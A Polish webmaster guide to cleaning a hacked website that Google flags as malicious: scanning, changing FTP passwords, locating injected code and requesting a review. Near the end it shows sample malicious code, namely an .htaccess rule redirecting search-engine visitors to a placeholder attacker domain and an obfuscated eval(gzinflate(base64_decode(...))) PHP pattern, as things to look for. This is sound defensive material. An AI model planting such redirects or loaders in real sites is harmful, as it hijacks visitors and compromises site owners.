Na forum pomocy Google regularnie pojawiają się pytania dotyczące ostrzeżenia przed wejściem na stronę internetową. Google dba o nasze bezpieczeństwo przez oznaczenie w wynikach wyszukiwania stron, które „mogą wyrządzić szkody na twoim komputerze”.
Jeśli nie możesz wejść na swoją stronę i widzisz taki oto komunikat:
to wiedz, że coś się dzieje!
Musisz wykonać kilka czynności bez względu na to, z jakim zagrożeniem mamy do czynienia.
- Przeskanuj swój komputer antywirusem z najnowszą bazą wirusów. Przeskanuj (lub zleć przeskanowanie) wszystkie komputery, z których ktoś łączył się z serwerem FTP. Osobiście polecam popularne antywirusy – Avast czy mksvir.
- Usuń zapamiętane hasła do FTP w klientach FTP.
- Zmień hasła dostępowe do serwera FTP, na którym znajduje się zainfekowana strona.
- Jeśli nie znasz się na .php, edycja plików .php, .html są Ci obce, nic więcej nie rób. Skontaktuj się z webmasterem (realizuję zlecenia odpłatnie – kontakt) i opisz mu problem.
- Jeśli potrafisz edytować pliki .php, czytaj dalej.
- Zaloguj się na serwer FTP i sprawdź datę ostatniej modyfikacji plików .php. Zainfekowane pliki .php będą miały tę samą datę i godzinę ostatniej edycji.
- Jeśli na serwerze masz inne serwisy oprócz zainfekowanej strony, one również są zagrożone i prawdopodobnie zainfekowane.
- Zrób kopię całego FTP na dysku komputera.
- Sprawdź kopię antywirusem i w razie potrzeby usuń szkodliwy kod.
- Jeśli antywirus nic nie znajdzie nie oznacza to, że strona jest czysta!
- Otwórz podejrzany plik z serwera i sprawdź, czy nad lub pod kodem strony masz doklejony dziwny i nieznany kod. Może być zakodowany.
- Jeśli pliki zawierają nieznany kod, usuń go.
- Po oczyszczeniu wszystkich plików na serwerze, wyślij prośbę o ocenę witryny pod kątem obecności złośliwego oprogramowania. Formularz znajdziesz w Narzędziach dla Webmasterów, zakładka Problemy dotyczące bezpieczeńśtwa (https://www.google.com/webmasters/tools/security-issues?hl=pl)
- Jeśli strona jest czysta, informacja o wykryciu złośliwego oprogramowania zniknie w przeciągu kilku dni.
- Jeśli po tygodniu informacja nie zniknęła, najprawdopodobniej strona jest nadal zainfekowana.
Wirusy i włamanie na stronę odbywa się zazwyczaj na dwa sposoby: przez dziury w skryptach naszej strony lub przez wyciąganie hasła do serwera FTP z naszego klienta FTP. Darmowe skrypty for internetowych czy CMSów, nieznane wtyczki i rozszerzenia są potencjalnym źródłem ataku na stronę. Należy instalować tylko sprawdzone dodatki i w najnowszych wersjach. I nie trzymajmy haseł zapamiętanych w programach do komunikacji z FTP!!!
Jak wygląda złośliwy kod i gdzie go szukać?
Złośliwe przekierowanie z wyszukiwarki Google:
- w pliku .htaccess -<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERRER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter).(.*)
RewriteRule ^(.*)$ http://domenawlamywacza.com/podstrona [R=301,L] </IfModule> - przekierowanie w kodzie w plikach .php – eval(gzinflate(base64_decode(’ciagroznychznakowbardzodlugi)));
- powyższe kody mogą znajdować się w innych katalogach w obrębie całego serwera FTP, czyli niekoniecznie w strukturze zainfekowanej witryny;
Złośliwy kod może być zagnieżdżony głęboko w strukturze katalogów (schowany). Przed usunięciem kodu zaczynającego się od eval(gzinflate(base64…. warto go rozkodować i sprawdzić, czy nie zawiera ścieżki dostępu do instalki zagnieżdżonej gdzieś na serwerze. Bez zlokalizowania instalki usunięcie złośliwego kodu pomoże na najwyżej kilka godzin…